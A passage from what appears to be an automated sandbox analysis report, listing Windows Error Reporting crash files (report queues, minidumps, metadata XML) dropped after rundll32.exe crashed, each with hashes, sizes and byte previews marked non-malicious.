                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.4.3.4.8.8.2.5.8.5.7.5.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.4.3.4.8.9.7.4.2.9.4.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.b.f.3.2.f.6.5.-.3.2.1.5.-.4.7.4.8.-.8.9.d.e.-.3.d.a.7.d.c.2.6.5.d.f.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.4.4.0.e.f.8.-.c.9.f.c.-.4.2.f.d.-.8.d.6.a.-.b.8.6.9.f.2.9.0.3.d.0.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.9.8.-.0.0.0.1.-.0.0.1.5.-.d.5.3.9.-.a.a.f.5.8.4.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.2.d.7.!.r.

                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_a0314137803a1043baaff1e9589f71f27add7_7522e4b5_d33d174c-de90-4248-b0e7-9f72a053bdd6\Report.wer

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.9959570672744001
                              Encrypted:false
                              SSDEEP:192:nwkRigOJb20BU/wjeT/JZrt8tzuiFOZ24IO84ci:tiRJbdBU/wjeGzuiFOY4IO84ci
                              MD5:5869718E6944364252532CFBB91F63BB
                              SHA1:723A38B8A2599F7D2CCD41DC81692035D95DEC3E
                              SHA-256:0EE855E01E3B92D8FC71054327074714744751505741CDFBCBE30148B4016186
                              SHA-512:E1A5ECC1FF8472453AC452037D162D9E35767BC699D098BAF5DC893917FD4567FB88078613613824AB12ECA10A3B041084C5544423C1E84B25EF529E9D910020
                              Malicious:false
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.4.3.4.6.3.6.5.5.8.7.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.4.3.4.6.4.7.1.8.3.7.4.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.3.d.1.7.4.c.-.d.e.9.0.-.4.2.4.8.-.b.0.e.7.-.9.f.7.2.a.0.5.3.b.d.d.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.e.4.6.4.1.9.5.-.2.f.b.1.-.4.0.b.9.-.8.7.b.3.-.d.2.0.7.e.0.a.7.e.5.9.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.7.8.-.0.0.0.1.-.0.0.1.5.-.0.7.a.e.-.6.9.d.8.8.4.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.2.d.7.!.r.

                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_e9db3974feef2fdb7c6133a2901c81c23d9dbf87_7522e4b5_7ce1b75d-83e4-4609-bf64-b81d25dc6629\Report.wer

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.1798078083822947
                              Encrypted:false
                              SSDEEP:192:1Ai4Od60o89HjeT/JZrtUKnzzuiFOZ24IO8dci:eipdBo89HjeJzzuiFOY4IO8dci
                              MD5:C919D21CCFC4979C736F0D32D043F418
                              SHA1:9A547E30E9BE7D5450D09E8A018F045DAA8B0F65
                              SHA-256:402DFE4222BBD2CA7C04ED77ED888F2B2D9B9217DB480F406285215475336F05
                              SHA-512:F236899D443F660229373984554A2D931D0FAE09C0247DDE073DFF484C179818B1934005744E72D6226239BB7BAB0DD0448852640515F509BBF36DC0476DB942
                              Malicious:false
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.4.3.4.9.3.0.0.1.8.8.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.4.3.4.9.4.5.8.0.0.0.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.c.e.1.b.7.5.d.-.8.3.e.4.-.4.6.0.9.-.b.f.6.4.-.b.8.1.d.2.5.d.c.6.6.2.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.9.f.f.8.3.7.b.-.b.a.3.b.-.4.d.d.4.-.b.f.7.d.-.b.2.5.f.f.6.7.4.2.f.e.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.4.8.-.0.0.0.1.-.0.0.1.5.-.9.f.5.1.-.a.0.f.5.8.4.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER346B.tmp.dmp

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 14 streams, Wed Jan 15 19:37:43 2025, 0x1205a4 type
                              Category:dropped
                              Size (bytes):46980
                              Entropy (8bit):1.9743481082894414
                              Encrypted:false
                              SSDEEP:192:6PJC8HVJYXsa5O5H4zWwKSCNxAf+teakL:UCH85HzXAf+tg
                              MD5:A855002B8E1F48E03988C08EF9DC0705
                              SHA1:35AFBBEF9A16C53D8543BD08418A4DDCEBBFBC2B
                              SHA-256:84A712FBA8EC7CD4A923320593444DCB3BCCE4571602E451760CA2F79348A8E7
                              SHA-512:19605A540466EAA82AE9D6CA010C4109A3077C2CD558274A3CF8A06183327D597419DC75877DA2DFB5EA179FBD4119732F7A1D2C20F029B2077BC8A7AF461F77
                              Malicious:false
                              Preview:MDMP..a..... ..........g........................`................1..........T.......8...........T.......................................................................................................................eJ....... ......GenuineIntel............T.......x...\..g.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER3576.tmp.WERInternalMetadata.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8352
                              Entropy (8bit):3.6921742662173154
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJeF626Ypp62gmf8/fXpr089bxVsfvZbm:R6lXJE626Y362gmf8/fLxufg
                              MD5:BF01BAC363EEF2AA05148A3402D5DCDC
                              SHA1:6E4E912CC9EBCCAEB905AAF0380EFD527EA18CCB
                              SHA-256:77A9F68ED6E49F4BFDA72BFEC1B501FFF35A887627C9CF34DD8E02714920CAD2
                              SHA-512:7C11253A757CADB4E1350DA821DA4664787F62DCA2E5CC3A3354A628B4DE67B8A7051FABB6A68952669D212A89B890F971BEE749257D00098BF8EBAC9975EC8B
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.9.1.2.<./.P.i.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER35C5.tmp.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4749
                              Entropy (8bit):4.446091998175132
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zseJg77aI9n0WpW8VY5YsYm8M4JCdP5XF9Qi+q8vjP52GScSDd:uIjfUI7Jt7VmsJkQiK8J3Dd
                              MD5:BCF32556AFD941643E529BD03A4E5223
                              SHA1:52195E74E22DFECA32129131FE57F3FAA2781F6C
                              SHA-256:B8304E6CFF696A1AD59836347932E6F170719EB3F1451DDBF80F563E1BEEB585
                              SHA-512:AA64398E0D03E4EF4F2642A20D5BBBE57488581FEDEDC622AAE2FF83B23BF7921BABE03AEB33D802807CCA634EBE43C926FED9DB832EDDB09869A65C09C5C9DD
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677440" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER948D.tmp.dmp

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 14 streams, Wed Jan 15 19:38:09 2025, 0x1205a4 type
                              Category:dropped
                              Size (bytes):46924
                              Entropy (8bit):1.9773734180101197
                              Encrypted:false
                              SSDEEP:192:U2JC8YxkTXQaJhXO5H4u3pLgiltuOj/KLnBLJM:1CoJU5H/ZLK2y
                              MD5:0952A070C090459A016738AD025168DC
                              SHA1:1EAE28C3A9798ACEE2A2A75ED498D489AF905EB4
                              SHA-256:58B105F3EDF4ABDF93B2C525A69557889B25FA2AA1581F4240FAE2EC7DFB5B7D
                              SHA-512:5ACEE99413B428158DBB82FA6DBD32C38B0F1D000485E83720C7243EEEBE92BDCE3AA44A85219559787FC2EEBD673D3E8836C8AC40BCEB62FF2458FC986B03F9
                              Malicious:false
                              Preview:MDMP..a..... ..........g........................`................1..........T.......8...........T......................................................................................................................eJ....... ......GenuineIntel............T..............g.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER978B.tmp.WERInternalMetadata.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8358
                              Entropy (8bit):3.6929156957593596
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJ4T690+6Yy269ggmf8/fXprx89bQAsfZwm:R6lXJ06O+6Yr69ggmf8/fkQTfb
                              MD5:4EAB179661B57E9DB3E3829F2C284DE3
                              SHA1:CEB5A7BBB7047E98DA6CB8839CEBCB3357362634
                              SHA-256:5DA4380985BDABF919DB6A255A1402464FA93F6D43CC8812C5D4ED265FC9AD0B
                              SHA-512:6C9C451ED3F01CDF66080E4EBAC59A62B12F1F24AB52F8640A5BD3E0A489202E5B755D6997D760303868F07AA65B5F2EDF4DE61ED717AE06E60972AB56B6B745
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.6.4.<./.P.i.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER97BB.tmp.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4749
                              Entropy (8bit):4.44651433693268
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zseJg77aI9n0WpW8VYxYm8M4JCdP5XFfa+q8vjP5MGScSSd:uIjfUI7Jt7V9JmaK2J3Sd
                              MD5:94B01D1D1109DE3B8C459B46E066F801
                              SHA1:148393D7818CE3FF54D9A39B8F147CB2735DF770
                              SHA-256:3C5ABED929445F874B97A695ACB696CB6C13F615CA9F4A76217F94CC871240B4
                              SHA-512:A0578AE67849BF13CBC70242410F145D417B2543102CEE2532C3D97C1550A5662099568AB5095D47B46AE0878054FA444AD3F2149046EA634E6A4BBF6C11D296
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677440" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERA71B.tmp.dmp

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 14 streams, Wed Jan 15 19:38:13 2025, 0x1205a4 type
                              Category:dropped
                              Size (bytes):48112
                              Entropy (8bit):2.767165652974777
                              Encrypted:false
                              SSDEEP:384:IYTrEBnx9veM7oWK5HzLOLdpjErNU5Qq5fOQNq274:I2sxFedWK5zLQnYi5mQNs
                              MD5:6918FD548CFA2110B147C9A22F58D269
                              SHA1:05C0F271C5CF824B29AECFC22B37478820728CBE
                              SHA-256:B8B7792BE963BCEE531810164EE7CC07A66A8899A25A4C85BFA31BF451D4F2A1
                              SHA-512:70AA7788CD2E67D6FCCED968A12B44FFE69C054717F39E50883F4DB48883A0CE5209E2A1909E6101ED446E96E6DB068680D9D52298BACFEF8DFFB821A5136762
                              Malicious:false
                              Preview:MDMP..a..... ..........g............4............!..<.......$...*:..........T.......8...........T...........P................)...........*..............................................................................eJ.......+......GenuineIntel............T.......H......g.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERA900.tmp.WERInternalMetadata.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8304
                              Entropy (8bit):3.6973514370621636
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJqU6OAvR6YyV69ggmfTqZpr089bbEsfiJm:R6lXJx6OW6Y469ggmfTq1b3fF
                              MD5:F45FDDE89D437A769528C9D88E2FC17D
                              SHA1:95A50D59D5A3C897AE8BDBAD4B24EF1CF376DCD0
                              SHA-256:EA8300CF758D198BFAFA5A15615E2D894DF2D442C8408913D41EB12C019BD56B
                              SHA-512:8B5CECA5D48046D6BDECC0A213058CEA6B2271293A2DDDA36450F33B6E12FA23C9CFEC81F7095038ABF7AFBE01A5F02E8A16117E09C85D48745C8D36B50A6685
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.9.2.<./.P.i.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERA940.tmp.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4658
                              Entropy (8bit):4.47726134873364
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zseJg77aI9n0WpW8VY9Ym8M4JCdP5uq1FXd+q8/LNEqs1GScSQd:uIjfUI7Jt7VlJWuqdcuqs1J3Qd
                              MD5:A6E678187126C167FE42EA7A7D7099B8
                              SHA1:26EFBCAE0B3298E09879EA707085BEDC9F97EB90
                              SHA-256:8D03CDD2DFABCB0C8738D10C5AC0A604CD1A8B89A323C435CCC0C89A3767C81A
                              SHA-512:2E197A1E2F6D983DF2B0E192BE33AC7A5CC54BB9DB25D7D258D27E7AD65E070E1F2324DEC0037D14759889675002EB3C223F72BB3E02F89B0C5BFE3F479FD4E5
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677440" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB285.tmp.dmp

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 14 streams, Wed Jan 15 19:38:16 2025, 0x1205a4 type
                              Category:dropped
                              Size (bytes):43648
                              Entropy (8bit):2.787476200801324
                              Encrypted:false
                              SSDEEP:384:u8TrEBnx9veMk5HzLDp7ErNreeMwic3IZj:uKsxFe35zLlQ9MdcOj
                              MD5:AA582459C516BC8BDBC4F47F029E2260
                              SHA1:24B0774D3DE9A85299E21C08B525B73697FE19E5
                              SHA-256:D11F1F0FD140AB176DAE75B36EA9DF9D55F86D6DCD0623809BD77EE2B1B01B9C
                              SHA-512:4F53904BD522578A60B3CE861C924256206AB4B916EC488A854B13B11B42445779350D4648C812E8D2F83CF2D0C230DD442C357FA9895C57DB9E17466C2DA9F8
                              Malicious:false
                              Preview:MDMP..a..... ..........g............4............!..<...........*:..........T.......8...........T................|...........)...........*..............................................................................eJ.......+......GenuineIntel............T.......H......g.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB38F.tmp.WERInternalMetadata.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8304
                              Entropy (8bit):3.6968703464085775
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJqb6PEvR6YyJ69ggmfTW6hpDT89b2EsfpuSm:R6lXJO6q6Yk69ggmfTW6Q23fo
                              MD5:BC90C7FEE993D81D4697F07BCA7C2B90
                              SHA1:4DC599C0A116C063F352BDA1E949C93812DF68F2
                              SHA-256:5F3B3D20ACD1ED43E3ECBB8848DCADF2093E68E5EA3AB5A3FDF6041154976AAE
                              SHA-512:927AE04B9E3B16BE4ED5884D43EA567B038B2AF69AB41B9AEF6092849E2A92B1BF5EA03489D7A98157A0FD0537C6129717D99B7AD9BA11EBCFDA5B3A025DB740
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.9.2.<./.P.i.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB3BF.tmp.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
